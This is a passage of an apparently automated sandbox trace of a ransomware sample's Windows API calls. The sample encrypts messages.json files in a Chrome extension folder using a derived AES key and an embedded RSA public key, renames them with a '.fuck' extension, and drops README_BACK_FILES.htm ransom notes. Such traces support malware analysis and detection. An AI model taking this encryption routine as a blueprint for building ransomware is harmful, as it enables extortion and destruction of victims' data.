nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.136] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.136] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.136] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.136] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.136] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.136] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.136] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.136] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.136] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.136] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.137] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.137] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.137] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.137] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.137] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.137] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.137] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.137] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.137] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.138] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.138] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.138] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.138] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.138] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.138] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x2dd, lpOverlapped=0x0) returned 1 [0263.138] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x2dd, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x2e0) returned 1 [0263.138] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x2e0, lpOverlapped=0x0) returned 1 [0263.138] CloseHandle (hObject=0x5d60) returned 1 [0263.138] CloseHandle (hObject=0x5d5c) returned 1 [0263.138] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json"), bFailIfExists=0) returned 1 [0263.142] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json", dwFileAttributes=0x0) returned 1 [0263.143] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json.gsg")) returned 1 [0263.144] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json.fuck")) returned 1 [0263.145] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0263.145] CryptDestroyKey (hKey=0x2e7de00) returned 1 [0263.145] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0263.145] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0263.145] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0263.145] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\readme_back_files.htm")) returned 0xffffffff [0263.146] AreFileApisANSI () returned 1 [0263.146] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0263.146] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0263.147] GetFileType (hFile=0x5d64) returned 0x1 [0263.147] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0263.148] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0263.148] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fd40 [0263.148] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0263.148] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0263.148] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0263.148] GetLastError () returned 0x0 [0263.148] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json")) returned 0x20 [0263.149] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json", dwFileAttributes=0x80) returned 1 [0263.149] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0263.150] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0263.151] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0263.151] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0263.153] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0263.153] lstrlenA (lpString="nyVZwrEPeJcSGZnLzNUpNIeDzMlQm") returned 29 [0263.153] CryptHashData (hHash=0x2e7fc40, pbData=0x28cb2d8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0263.153] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fc40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7da00) returned 1 [0263.153] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0263.153] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0263.153] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e739b0) returned 1 [0263.154] CryptImportPublicKeyInfo (in: hCryptProv=0x2e739b0, dwCertEncodingType=0x1, pInfo=0x2eadf80*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eadfb0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eadfb8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7e700) returned 1 [0263.154] CryptEncrypt (in: hKey=0x2e7e700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0263.154] CryptEncrypt (in: hKey=0x2e7e700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e73ac0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e73ac0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0263.154] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e73ac0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e73ac0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0263.155] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.163] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.163] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.183] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.183] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.183] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.183] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.184] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.184] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.184] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.184] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.184] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.184] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.184] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.184] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.184] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.184] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.184] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.184] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.185] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.185] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.185] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.185] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.185] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.185] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.185] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.185] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.185] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.185] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.185] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.185] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.185] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, 